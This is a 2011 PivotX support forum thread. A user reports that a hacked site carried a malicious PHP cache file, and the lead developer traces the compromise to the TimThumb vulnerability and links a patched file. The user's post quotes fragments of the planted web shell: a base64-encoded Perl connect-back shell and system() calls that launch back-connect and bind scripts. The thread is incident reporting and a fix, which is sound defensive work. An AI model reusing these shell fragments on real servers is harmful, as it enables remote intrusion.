Cache file perl execution causing site down

This is the place to discuss bugs that have been found in the most recent version of PivotX. Posting bugs will ensure that the Development Team is aware of them and that they will be addressed when resources are available.

Cache file perl execution causing site down

Postby Cranialstrain » Tue Oct 11, 2011 5:22 pm

Hi all,

All my sites went down about 5am this morning and after some digging by the hosting people they tracked it down to this, any ideas? We've since had to delete the contents of the cache directory to bring everything up but managed to capture this beforehand:

Code: Select all
./blog.mysite.net/pivotx/db/cache/a24bcf2198b1b13ad985304483f7f324.php:$bcperl="Iy    EvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
./blog.mysite.net/pivotx/db/cache/a24bcf2198b1b13ad985304483f7f324.php:fwrite(    $opbc,base64_decode($bcperl));
./blog.mysite.net/pivotx/db/cache/a24bcf2198b1b13ad985304483f7f324.php:system(    "perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect     Disable_functions Or Safe Mode");
./blog.mysite.net/pivotx/db/cache/a24bcf2198b1b13ad985304483f7f324.php:system(    "perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions     Or Safe Mode");
./blog.mysite.net/pivotx/db/cache/a24bcf2198b1b13ad985304483f7f324.php:system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");

I have two PivotX sites and confess this one is running on 2.1 (not 2.3 like the other); I couldn't see anything in the change notes to explain this however.

Thanks!
Cranialstrain
 
Posts: 74
Joined: Tue Feb 26, 2008 9:10 am

Re: Cache file perl execution causing site down

Postby Bob » Tue Oct 11, 2011 6:39 pm

Upgrade your PivotX. This is a vulnerability in Timthumb.php, that has been fixed in 2.3.0.

There will be a 2.3.1 update very soon, but you should replace timthumb.php in pivotx/includes right now. Get this file, unzip it, and replace it on your server: http://pivotx.net/files/misc/timthumb_2011-10-11.zip
Bob
Lead Developer
 
Posts: 1374
Joined: Tue Nov 20, 2007 11:16 pm

Re: Cache file perl execution causing site down

Postby Cranialstrain » Tue Oct 11, 2011 9:17 pm

Thanks Bob, as always the PivotX community and support astounds me :-)

Best wishes, Ian.
Cranialstrain
 
Posts: 74
Joined: Tue Feb 26, 2008 9:10 am

Re: Cache file perl execution causing site down

Postby Bob » Wed Oct 12, 2011 1:16 pm

Hi,

I accidentaly linked you to a broken version of timthumb.php yesterday. You should use this one:
http://pivotx.net/files/misc/timthumb_2011-10-12.zip

(or upgrade to 2.3.1, released later today)
Bob
Lead Developer
 
Posts: 1374
Joined: Tue Nov 20, 2007 11:16 pm


Return to 2.x Bugs

Who is online

Users browsing this forum: No registered users and 3 guests

cron